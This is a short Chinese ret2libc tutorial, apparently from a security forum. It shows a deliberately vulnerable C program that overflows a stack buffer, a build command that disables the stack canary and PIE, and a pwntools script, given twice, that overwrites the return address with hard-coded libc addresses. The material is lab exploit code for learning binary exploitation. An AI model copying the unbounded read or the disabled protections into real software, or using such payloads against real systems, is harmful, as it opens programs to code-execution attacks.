1
什么是Ret2libc 技术
2
举例
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/*
 * Deliberately vulnerable teaching function: stack buffer overflow.
 *
 * buf holds 128 bytes, but read() is allowed to store up to 256 bytes from
 * stdin into it. Any input longer than 128 bytes is therefore written past
 * the end of buf into the stack data that follows it. The page's script
 * uses 140 filler bytes before the words it wants to place over the saved
 * return address; that offset depends on the compiler's stack layout.
 * The return value of read() is not checked.
 *
 * The defect is the length argument: the bound has to be the size of the
 * destination, e.g. read(STDIN_FILENO, buf, sizeof(buf)).
 */
void vulnerable_function()
{
char buf[128];
/* 256 is twice sizeof(buf): this single call is the overflow. */
read(STDIN_FILENO, buf, 256);
}
/*
 * Entry point of the demo target. Calls vulnerable_function() once, then
 * writes the 13-byte greeting "Hello, World\n" to stdout. argc and argv are
 * not used and there is no explicit return statement.
 *
 * The greeting is only written if vulnerable_function() returns here, so a
 * run that takes oversized input and prints no greeting did not come back
 * to this call site.
 */
int main(int argc, char** argv)
{
vulnerable_function();
write(STDOUT_FILENO, "Hello, World\n", 13);
}
# Lab build of test.c: the flags below turn off protections so that the
# overflow in vulnerable_function() reaches the saved return address.
#   -m32                  build a 32-bit binary
#   -fno-stack-protector  no stack canary, so the overwritten return
#                         address is not detected when the function returns
#   -no-pie               do not build a position-independent executable,
#                         so the binary's own code is not relocated
# Builds that are shipped should keep the stack protector and PIE enabled.
gcc -m32 -fno-stack-protector -no-pie -o test test.c
# Proof-of-concept driver for the ./test lab binary (pwntools).
# Python 2 syntax: the `print` statement below is a syntax error on Python 3.
# It sends one oversized input to the 128-byte buffer in vulnerable_function().
from pwn import *
# Start the target as a local child process.
p = process('./test')
# Print the child's PID (presumably so a debugger can be attached while
# pause() is waiting - confirm with the author).
print 'pid' + str(proc.pidof(p))
# Hard-coded absolute addresses taken from the author's own machine.
# NOTE(review): the page does not say what they point to. Given the ret2libc
# topic, `a` is presumably the libc function that replaces the saved return
# address, `ret` the address that function would return to, and `b` the
# function's first argument - confirm.
# NOTE(review): 0x5655.... is where 32-bit PIE binaries usually load, but
# the build line uses -no-pie - confirm which binary `ret` was taken from.
# The values only hold while libc and the binary load at the same addresses
# on every run; with address-space layout randomisation active, or with a
# different libc build, they point somewhere else.
ret=0x56556226
a = 0xf7e0a830
b = 0xf7f57352
# 140 filler bytes (128 for buf plus whatever lies between buf and the saved
# return address in this build), then three 32-bit words in the order
# a, ret, b. A stack canary would sit inside the filler range and make the
# function abort on return, which is why the build disables it.
payload = 'a'*140 + p32(a) + p32(ret) + p32(b)
# Wait for the operator before sending.
pause()
p.send(payload)
# Hand the child's stdin/stdout over to the terminal.
p.interactive()
# This listing repeats the script shown directly above, line for line.
# pwntools driver for the ./test lab binary, written for Python 2 (`print`
# is used as a statement).
from pwn import *
# Launch the lab binary locally.
p = process('./test')
# Report the PID of the launched process.
print 'pid' + str(proc.pidof(p))
# Absolute addresses copied from one specific run environment.
# NOTE(review): presumably `a` is a libc function address, `ret` its return
# address and `b` its argument - the page does not state this; confirm.
# They are not portable: a different libc, or address randomisation moving
# libc or the binary, invalidates all three.
ret=0x56556226
a = 0xf7e0a830
b = 0xf7f57352
# Input is 140 + 12 = 152 bytes, which exceeds the 128-byte buf and fits
# inside the 256 bytes that read() accepts. Bounding read() by sizeof(buf)
# would cut it off at 128 bytes, before the three appended words.
payload = 'a'*140 + p32(a) + p32(ret) + p32(b)
# Block until the operator continues.
pause()
p.send(payload)
# Connect the terminal to the child process.
p.interactive()
END
看雪ID:天象独行
https://bbs.pediy.com/user-home-911429.htm